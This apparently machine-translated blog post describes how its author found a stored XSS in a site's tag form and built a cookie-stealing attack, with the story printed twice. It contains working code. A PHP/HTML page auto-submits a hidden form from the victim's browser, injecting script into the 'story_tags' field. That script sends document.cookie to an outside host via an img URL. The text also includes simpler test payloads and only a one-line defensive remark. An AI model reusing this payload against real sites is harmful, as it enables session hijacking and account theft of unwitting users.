Hacking accounts through the form and event. "XSS" to avoid confusion with cascading style sheets
The second part of the title I took from the wiki article . It sounds funny.
I wanted to post the seals on the page, clicked the preview button, saw the loading of the content and my browser hung for half a second, expanding just below the button “add”, “my future post”. I clicked add, and I was informed that I must write at least two tags to the post. I typed "cute cats" - just below it appeared a block in which it was possible to pick up popular tags. I decided that this is very good and I need such a script for the collection. Without hesitation, I tore out the javascript page, opened and saw comments on the code in my native Russian.
It was very boring, and I decided to do a little hack with the permission of the administration, in order to test my strength, knowledge of languages ​​and specifications. The whole study took me 2 days, 3-4 hours a day.
')
I decided to check out the forms and try to break something, see a mistake or something else. They were fairly well protected: not a hint of SQL-injection or something like that.
After checking out our js file, I saw that several variables are not filtered at all on the client side, and you can execute any code on the page that I put in the form. The first thing I put in a classic.
From the sky down the window. It said that everything in this world is equal to 1.
I must say that this is pampering. So we have a simple xss. We will not be upset - this is enough for us.
I put in the form
Having read the errors in the browser, I inserted in the form <iframe saw the window of another site, checked the referral field, saw our domain, so if they check the referral for their own and not their own in checking requests to the server, we can already pretend to be our site and send any request, and we will answer.
On the page that I hacked can only be authorized users, and we can be represented in the request by the site itself, simply by entering into the form of any code.
Next, I’ll give you a malicious code that will send us a user's cookie, it is customized by me so that they don’t scold me much. The main piece of code that hides my actions on the page I will not give, I will show myself hacking.
1) Create a page in the same encoding as the one being attacked.
I think almost anyone can handle it.
2) In we must create a form that will send our request from the victim's browser
3) Encrypt our code for future submission to the form.
It remains to transfer the code to another domain correctly. I used the urlencode (); function. On the page describing the function, it is written: “This function is convenient when the encoded string will be used in the request as part of the URL, it is also a convenient way to pass variables to other pages.”
4) Hacker js code.
5) Well, after loading the page, we send all the data to the form.
Well, that's all, fill it all on the server.
6) In the analysis of traffic can be done with any online sniffer.
As a result, if a person comes to our server, and in his cookies there is a site we need, we immediately collect them. The code does not pretend to be discussed or analyzed, I am in the learning mode. My goal was the baptism of the battle to find at least one vulnerability.
From this attack, you can defend yourself by taking a preview in the tag
ps I said thank you and closed the vulnerability during the day.
I wanted to post the seals on the page, clicked the preview button, saw the loading of the content and my browser hung for half a second, expanding just below the button “add”, “my future post”. I clicked add, and I was informed that I must write at least two tags to the post. I typed "cute cats" - just below it appeared a block in which it was possible to pick up popular tags. I decided that this is very good and I need such a script for the collection. Without hesitation, I tore out the javascript page, opened and saw comments on the code in my native Russian.
It was very boring, and I decided to do a little hack with the permission of the administration, in order to test my strength, knowledge of languages ​​and specifications. The whole study took me 2 days, 3-4 hours a day.
')
I decided to check out the forms and try to break something, see a mistake or something else. They were fairly well protected: not a hint of SQL-injection or something like that.
After checking out our js file, I saw that several variables are not filtered at all on the client side, and you can execute any code on the page that I put in the form. The first thing I put in a classic.
<script>alert(1)</script> From the sky down the window. It said that everything in this world is equal to 1.
I must say that this is pampering. So we have a simple xss. We will not be upset - this is enough for us.
I put in the form
<script>window.eval = function(code){console.log(code)}</script> Having read the errors in the browser, I inserted in the form <iframe saw the window of another site, checked the referral field, saw our domain, so if they check the referral for their own and not their own in checking requests to the server, we can already pretend to be our site and send any request, and we will answer.
On the page that I hacked can only be authorized users, and we can be represented in the request by the site itself, simply by entering into the form of any code.
Next, I’ll give you a malicious code that will send us a user's cookie, it is customized by me so that they don’t scold me much. The main piece of code that hides my actions on the page I will not give, I will show myself hacking.
1) Create a page in the same encoding as the one being attacked.
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body> <!-- --> </body> </html> I think almost anyone can handle it.
2) In we must create a form that will send our request from the victim's browser
<iframe src="# " method="post"></iframe> <form action="# " method="POST"> <input type="hidden" name="# xss." value=" "/> </form> 3) Encrypt our code for future submission to the form.
<?php $txt1 = "<script>var url='<img src=http://www1.hut.ru/testi.shtml?cookie='+document.cookie+'>';</script>"; $txt2 = "<script>document.write(url);</script>"; $txt11 = urlencode($txt1); $txt22 = urlencode($txt2); ?> It remains to transfer the code to another domain correctly. I used the urlencode (); function. On the page describing the function, it is written: “This function is convenient when the encoded string will be used in the request as part of the URL, it is also a convenient way to pass variables to other pages.”
4) Hacker js code.
5) Well, after loading the page, we send all the data to the form.
Well, that's all, fill it all on the server.
6) In the analysis of traffic can be done with any online sniffer.
Completely the code turned out such
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body> <?php $txt1 = "var url='<img src=#c?cookie='+document.cookie+'>';"; $txt2 = "<script>document.write(url);</script>"; $txt11 = urlencode($txt1); $txt22 = urlencode($txt2); ?> <iframe src="# " method="post"></iframe> <form action="# " method="POST"> <input type="hidden" name="story_tags" value=" <script><?php echo $txt11 ;?></script> , <script><?php echo $txt22 ;?></script>"/> </form> <script> window.onload = function() {document.forms[0].submit()} </script> </body> </html> As a result, if a person comes to our server, and in his cookies there is a site we need, we immediately collect them. The code does not pretend to be discussed or analyzed, I am in the learning mode. My goal was the baptism of the battle to find at least one vulnerability.
From this attack, you can defend yourself by taking a preview in the tag
<noscript> ps I said thank you and closed the vulnerability during the day.
Source: https://habr.com/ru/post/213783/
All Articles